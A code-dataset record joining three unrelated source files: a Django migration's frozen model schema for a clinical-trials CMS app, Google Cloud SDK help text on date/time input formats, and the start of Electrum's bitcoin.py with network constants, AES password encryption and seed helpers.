'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'contacts_and_people.building': {
'Meta': {'ordering': "('site', 'street', 'number', 'name')", 'object_name': 'Building'},
'access_and_parking': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'building_access_and_parking'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'additional_street_address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'building_description'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'getting_here': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'getting_here'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'map': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'postcode': ('django.db.models.fields.CharField', [], {'max_length': '9', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'place'", 'on_delete': 'models.PROTECT', 'to': "orm['contacts_and_people.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '256'}),
'zoom': ('django.db.models.fields.IntegerField', [], {'default': '17', 'null': 'True', 'blank': 'True'})
},
'contacts_and_people.entity': {
'Meta': {'ordering': "['tree_id', 'lft']", 'object_name': 'Entity', '_ormbases': ['contacts_and_people.EntityLite']},
'abstract_entity': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'access_note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auto_contacts_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_news_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_publications_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_vacancies_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'building': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts_and_people.Building']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'building_recapitulates_entity_name': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'contacts_page_intro': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'contacts_page_intro'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'contacts_page_menu_title': ('django.db.models.fields.CharField', [], {'default': "'Contacts & people'", 'max_length': '50'}),
'display_parent': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'entitylite_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['contacts_and_people.EntityLite']", 'unique': 'True', 'primary_key': 'True'}),
'external_url': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'entity_item'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['links.ExternalLink']"}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'news_page_intro': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'news_page_intro'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'news_page_menu_title': ('django.db.models.fields.CharField', [], {'default': "'News & events'", 'max_length': '50'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['contacts_and_people.Entity']"}),
'precise_location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'publications_page_menu_title': ('django.db.models.fields.CharField', [], {'default': "'Publications'", 'max_length': '50'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'blank': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'vacancies_page_intro': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'vacancies_page_intro'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'vacancies_page_menu_title': ('django.db.models.fields.CharField', [], {'default': "'Vacancies & studentships'", 'max_length': '50'}),
'website': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entity'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['cms.Page']", 'blank': 'True', 'unique': 'True'})
},
'contacts_and_people.entitylite': {
'Meta': {'object_name': 'EntityLite'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'contacts_and_people.membership': {
'Meta': {'ordering': "('-importance_to_entity', 'person__surname')", 'object_name': 'Membership'},
'display_role': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'display_roles'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['contacts_and_people.Membership']"}),
'entity': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'members'", 'to': "orm['contacts_and_people.Entity']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'importance_to_entity': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'importance_to_person': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'key_contact': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_of'", 'to': "orm['contacts_and_people.Person']"}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'})
},
'contacts_and_people.person': {
'Meta': {'ordering': "['surname', 'given_name', 'user']", 'object_name': 'Person', '_ormbases': ['contacts_and_people.PersonLite']},
'access_note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'building': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts_and_people.Building']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'data_feed_locked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'entities': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'people'", 'to': "orm['contacts_and_people.Entity']", 'through': "orm['contacts_and_people.Membership']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'external_url': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'person_item'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['links.ExternalLink']"}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'institutional_username': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'override_entity': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'people_override'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['contacts_and_people.Entity']"}),
'personlite_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['contacts_and_people.PersonLite']", 'unique': 'True', 'primary_key': 'True'}),
'please_contact': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'contact_for'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['contacts_and_people.Person']"}),
'precise_location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'blank': 'True'}),
'staff_id': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'person_user'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['auth.User']", 'blank': 'True', 'unique': 'True'})
},
'contacts_and_people.personlite': {
'Meta': {'object_name': 'PersonLite'},
'given_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'middle_names': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'surname': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts_and_people.Title']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'contacts_and_people.phonecontact': {
'Meta': {'ordering': "('label',)", 'object_name': 'PhoneContact'},
'area_code': ('django.db.models.fields.CharField', [], {'default': "'029'", 'max_length': '5'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'44'", 'max_length': '5'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_extension': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'contacts_and_people.site': {
'Meta': {'ordering': "('country', 'site_name', 'post_town')", 'object_name': 'Site'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post_town': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'site_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
'contacts_and_people.title': {
'Meta': {'ordering': "['title']", 'object_name': 'Title'},
'abbreviation': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'filer.file': {
'Meta': {'object_name': 'File'},
'_file_size': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'folder': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'all_files'", 'null': 'True', 'to': "orm['filer.Folder']"}),
'has_all_mandatory_data': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'original_filename': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'owned_files'", 'null': 'True', 'to': "orm['auth.User']"}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_filer.file_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'sha1': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40', 'blank': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'filer.folder': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('parent', 'name'),)", 'object_name': 'Folder'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'filer_owned_folders'", 'null': 'True', 'to': "orm['auth.User']"}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['filer.Folder']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'filer.image': {
'Meta': {'object_name': 'Image', '_ormbases': ['filer.File']},
'_height': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'_width': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'default_alt_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'default_caption': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'file_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['filer.File']", 'unique': 'True', 'primary_key': 'True'}),
'must_always_publish_author_credit': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'must_always_publish_copyright': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'subject_location': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'})
},
'links.externallink': {
'Meta': {'ordering': "['title']", 'object_name': 'ExternalLink'},
'description': ('django.db.models.fields.TextField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'external_site': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'links'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['links.ExternalSite']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kind': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'links'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['links.LinkType']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'links.externalsite': {
'Meta': {'ordering': "['domain']", 'object_name': 'ExternalSite'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['links.ExternalSite']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'links.linktype': {
'Meta': {'object_name': 'LinkType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'scheme': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['arkestra_clinical_trials'] | bsd-2-clause | -6,084,172,808,788,019,000 | 99.023599 | 262 | 0.564131 | false |
KaranToor/MA450 | google-cloud-sdk/.install/.backup/lib/surface/topic/datetimes.py | 6 | 3921 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Date/time input format supplementary help."""
from googlecloudsdk.calliope import base
# NOTE: If the name of this topic is modified, please make sure to update all
# references to it in error messages and other help messages as there are no
# tests to catch such changes.
class DateTimes(base.TopicCommand):
"""Date/time input format supplementary help.
*gcloud* command line flags and filter expressions that expect date/time
string values support common input formats. These formats fall into two main
categories: absolute date/times and relative durations.
### Absolute date/time formats
Absolute date/time input formats minimally support
[ISO 8601](https://en.wikipedia.org/wiki/ISO_8601) and
[RFC 822](https://www.ietf.org/rfc/rfc0822.txt) date/times. When omitted the
date/time value defaults are:
* year, month, day - current value
* hour, minute, second, fractional second - 0
The supported absolute date/time input formats are listed here.
ISO 8601 / RFC 3339 zulu:
2003-09-25T10:49:41.519Z
2003-09-25T10:49:41Z
ISO 8601 numeric timezone offset:
2003-09-25T10:49:41.5-0000
2003-09-25T10:49:41.5-03:00
2003-09-25T10:49:41.5+0300
ISO with omitted parts:
2003-09-25T10:49:41
2003-09-25T10:49
2003-09-25T10
2003-09-25
RFC 822:
Thu, 25 Sep 2003 10:49:41 -0300
UNIX date command, explicit timezone:
Thu Sep 25 10:36:28 EDT 2003
2003 10:36:28 EDT 25 Sep Thu
local timezone:
Thu Sep 25 10:36:28 2003
omitted parts (date parts default to the current date, time parts default
to 0):
Thu Sep 25 10:36:28
Thu Sep 10:36:28
Thu 10:36:28
Thu 10:36
10:36
omitted parts with different order:
Thu Sep 25 2003
Sep 25 2003
Sep 2003
Sep
2003
ISO no separators:
20030925T104941.5-0300
20030925T104941-0300
20030925T104941
20030925T1049
20030925T10
20030925
no T separator:
20030925104941
200309251049
other date orderings:
2003-09-25
2003-Sep-25
25-Sep-2003
Sep-25-2003
09-25-2003
other date separators:
2003.Sep.25
2003/09/25
2003 Sep 25
2003 09 25
### Relative duration date/time formats
Relative durations are based on
[ISO 8601 durations](https://en.wikipedia.org/wiki/ISO_8601#Durations).
Relative durations are case-insensitive and must be prefixed with +P or -P.
They denote offsets from the current time.
A fully qualified duration string contains year, month, day, hour, minute,
second, and fractional second parts. Each part is a number followed by a
single character suffix:
* P - period (the duration designator)
* Y - year
* M - minute if after T or H, month otherwise
* D - day
* T - separates date parts from time parts
* H - hour
* M - minute if after T or H, month otherwise
* S - second (for fractional seconds, use decimal value for seconds)
At least one part must be specified. Omitted parts default to 0.
-P1Y2M3DT4H5M6.7S
+p1y2m3dT4h5m6.7s
A relative duration may be used in any context that expects a date/time
string.
For example:
* 1 month ago: -p1m
* 30 minutes from now: +pt30m
* 2 hours and 30 minutes ago: -p2h30m
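  Assuming, purely for illustration, that the current time is
  2016-01-19T12:00:00Z, these resolve to:
  * -p1m : 2015-12-19T12:00:00Z
  * +pt30m : 2016-01-19T12:30:00Z
  * -p2h30m : 2016-01-19T09:30:00Z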
"""
| apache-2.0 | 228,429,009,810,225,250 | 24.796053 | 78 | 0.694211 | false |
romanz/electrum | lib/bitcoin.py | 1 | 33211 | # -*- coding: utf-8 -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
import base64
import hmac
import os
import json
import ecdsa
import pyaes
from .util import bfh, bh2u, to_string
from . import version
from .util import print_error, InvalidPassword, assert_bytes, to_bytes, inv_dict
from . import segwit_addr
def read_json(filename, default):
path = os.path.join(os.path.dirname(__file__), filename)
try:
with open(path, 'r') as f:
r = json.loads(f.read())
except:
r = default
return r
class NetworkConstants:
@classmethod
def set_mainnet(cls):
cls.TESTNET = False
cls.WIF_PREFIX = 0x80
cls.ADDRTYPE_P2PKH = 0
cls.ADDRTYPE_P2SH = 5
cls.SEGWIT_HRP = "bc"
cls.GENESIS = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f"
cls.DEFAULT_PORTS = {'t': '50001', 's': '50002'}
cls.DEFAULT_SERVERS = read_json('servers.json', {})
cls.CHECKPOINTS = read_json('checkpoints.json', [])
cls.XPRV_HEADERS = {
'standard': 0x0488ade4, # xprv
'p2wpkh-p2sh': 0x049d7878, # yprv
'p2wsh-p2sh': 0x0295b005, # Yprv
'p2wpkh': 0x04b2430c, # zprv
'p2wsh': 0x02aa7a99, # Zprv
}
cls.XPUB_HEADERS = {
'standard': 0x0488b21e, # xpub
'p2wpkh-p2sh': 0x049d7cb2, # ypub
'p2wsh-p2sh': 0x0295b43f, # Ypub
'p2wpkh': 0x04b24746, # zpub
'p2wsh': 0x02aa7ed3, # Zpub
}
@classmethod
def set_testnet(cls):
cls.TESTNET = True
cls.WIF_PREFIX = 0xef
cls.ADDRTYPE_P2PKH = 111
cls.ADDRTYPE_P2SH = 196
cls.SEGWIT_HRP = "tb"
cls.GENESIS = "000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943"
cls.DEFAULT_PORTS = {'t':'51001', 's':'51002'}
cls.DEFAULT_SERVERS = read_json('servers_testnet.json', {})
cls.CHECKPOINTS = read_json('checkpoints_testnet.json', [])
cls.XPRV_HEADERS = {
'standard': 0x04358394, # tprv
'p2wpkh-p2sh': 0x044a4e28, # uprv
'p2wsh-p2sh': 0x024285b5, # Uprv
'p2wpkh': 0x045f18bc, # vprv
'p2wsh': 0x02575048, # Vprv
}
cls.XPUB_HEADERS = {
'standard': 0x043587cf, # tpub
'p2wpkh-p2sh': 0x044a5262, # upub
'p2wsh-p2sh': 0x024285ef, # Upub
'p2wpkh': 0x045f1cf6, # vpub
'p2wsh': 0x02575483, # Vpub
}
NetworkConstants.set_mainnet()
################################## transactions
COINBASE_MATURITY = 100
COIN = 100000000
# supported types of transction outputs
TYPE_ADDRESS = 0
TYPE_PUBKEY = 1
TYPE_SCRIPT = 2
# AES encryption
try:
from Cryptodome.Cipher import AES
except:
AES = None
class InvalidPadding(Exception):
pass
def append_PKCS7_padding(data):
assert_bytes(data)
padlen = 16 - (len(data) % 16)
return data + bytes([padlen]) * padlen
def strip_PKCS7_padding(data):
assert_bytes(data)
if len(data) % 16 != 0 or len(data) == 0:
raise InvalidPadding("invalid length")
padlen = data[-1]
if padlen > 16:
raise InvalidPadding("invalid padding byte (large)")
for i in data[-padlen:]:
if i != padlen:
raise InvalidPadding("invalid padding byte (inconsistent)")
return data[0:-padlen]
def aes_encrypt_with_iv(key, iv, data):
assert_bytes(key, iv, data)
data = append_PKCS7_padding(data)
if AES:
e = AES.new(key, AES.MODE_CBC, iv).encrypt(data)
else:
aes_cbc = pyaes.AESModeOfOperationCBC(key, iv=iv)
aes = pyaes.Encrypter(aes_cbc, padding=pyaes.PADDING_NONE)
e = aes.feed(data) + aes.feed() # empty aes.feed() flushes buffer
return e
def aes_decrypt_with_iv(key, iv, data):
assert_bytes(key, iv, data)
if AES:
cipher = AES.new(key, AES.MODE_CBC, iv)
data = cipher.decrypt(data)
else:
aes_cbc = pyaes.AESModeOfOperationCBC(key, iv=iv)
aes = pyaes.Decrypter(aes_cbc, padding=pyaes.PADDING_NONE)
data = aes.feed(data) + aes.feed() # empty aes.feed() flushes buffer
try:
return strip_PKCS7_padding(data)
except InvalidPadding:
raise InvalidPassword()
def EncodeAES(secret, s):
assert_bytes(s)
iv = bytes(os.urandom(16))
ct = aes_encrypt_with_iv(secret, iv, s)
e = iv + ct
return base64.b64encode(e)
def DecodeAES(secret, e):
e = bytes(base64.b64decode(e))
iv, e = e[:16], e[16:]
s = aes_decrypt_with_iv(secret, iv, e)
return s
def pw_encode(s, password):
if password:
secret = Hash(password)
return EncodeAES(secret, to_bytes(s, "utf8")).decode('utf8')
else:
return s
def pw_decode(s, password):
if password is not None:
secret = Hash(password)
try:
d = to_string(DecodeAES(secret, s), "utf8")
except Exception:
raise InvalidPassword()
return d
else:
return s
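# Minimal illustrative sketch (not used elsewhere in this module): a value
# round-tripped through pw_encode/pw_decode comes back unchanged. The password
# and plaintext below are made-up example values, not real secrets.
def _example_pw_roundtrip():
    token = pw_encode('hello', 'hunter2')      # base64 text safe to store
    assert pw_decode(token, 'hunter2') == 'hello'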
def rev_hex(s):
return bh2u(bfh(s)[::-1])
def int_to_hex(i, length=1):
assert isinstance(i, int)
s = hex(i)[2:].rstrip('L')
s = "0"*(2*length - len(s)) + s
return rev_hex(s)
def var_int(i):
# https://en.bitcoin.it/wiki/Protocol_specification#Variable_length_integer
if i<0xfd:
return int_to_hex(i)
elif i<=0xffff:
return "fd"+int_to_hex(i,2)
elif i<=0xffffffff:
return "fe"+int_to_hex(i,4)
else:
return "ff"+int_to_hex(i,8)
def op_push(i):
if i<0x4c:
return int_to_hex(i)
elif i<0xff:
return '4c' + int_to_hex(i)
elif i<0xffff:
return '4d' + int_to_hex(i,2)
else:
return '4e' + int_to_hex(i,4)
def push_script(x):
return op_push(len(x)//2) + x
def sha256(x):
x = to_bytes(x, 'utf8')
return bytes(hashlib.sha256(x).digest())
def Hash(x):
x = to_bytes(x, 'utf8')
out = bytes(sha256(sha256(x)))
return out
hash_encode = lambda x: bh2u(x[::-1])
hash_decode = lambda x: bfh(x)[::-1]
hmac_sha_512 = lambda x, y: hmac.new(x, y, hashlib.sha512).digest()
def is_new_seed(x, prefix=version.SEED_PREFIX):
from . import mnemonic
x = mnemonic.normalize_text(x)
s = bh2u(hmac_sha_512(b"Seed version", x.encode('utf8')))
return s.startswith(prefix)
def is_old_seed(seed):
from . import old_mnemonic, mnemonic
seed = mnemonic.normalize_text(seed)
words = seed.split()
try:
# checks here are deliberately left weak for legacy reasons, see #3149
old_mnemonic.mn_decode(words)
uses_electrum_words = True
except Exception:
uses_electrum_words = False
try:
seed = bfh(seed)
is_hex = (len(seed) == 16 or len(seed) == 32)
except Exception:
is_hex = False
return is_hex or (uses_electrum_words and (len(words) == 12 or len(words) == 24))
def seed_type(x):
if is_old_seed(x):
return 'old'
elif is_new_seed(x):
return 'standard'
elif is_new_seed(x, version.SEED_PREFIX_SW):
return 'segwit'
elif is_new_seed(x, version.SEED_PREFIX_2FA):
return '2fa'
return ''
is_seed = lambda x: bool(seed_type(x))
# pywallet openssl private key implementation
def i2o_ECPublicKey(pubkey, compressed=False):
# public keys are 65 bytes long (520 bits)
# 0x04 + 32-byte X-coordinate + 32-byte Y-coordinate
